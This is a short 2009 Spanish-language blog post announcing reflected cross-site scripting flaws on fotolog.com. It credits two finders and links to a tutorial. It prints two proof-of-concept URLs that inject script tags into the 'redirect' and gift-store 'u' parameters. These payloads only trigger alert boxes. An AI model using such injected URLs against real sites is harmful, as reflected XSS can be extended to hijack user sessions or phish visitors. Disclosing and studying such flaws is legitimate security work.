. Con la tecnología de Blogger.

domingo, 22 de noviembre de 2009

XSS En Fotolog

Cross Site Scripting in fotolog.com (?
me acuerdo cuando no entendia un joraca , pero bueno..

el tutorial lo pueden encontrar aca.. a mi me gusto mucho o tambien deje unos pdfs creo qçsobre esta vulnerabilidad..

http://ricota.diosdelared.com/index.php?coment=688
 bueno el primero lo encontre fede_cp (si hai mas de uno)

http://account.fotolog.com/language?redirect=%22%3E%3Cscript%3Ealert(%22XSS%20encontrado%20por%20fede_cp%22)%3C/script%3E
el otro lo encontro mi ameegoh el TrueneX
pero para este se necesita estar logueado..
http://txn.fotolog.com/gift_store?id=110&u=%22/%3E%3Cscript%3Ealert(/XSS%20por%20TrueneX/)%3C/script%3E
una imagen..

eso seria todo...

saludos ;D

Publicado por Darioxhcx en 19:52

Etiquetas: ,

0 comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)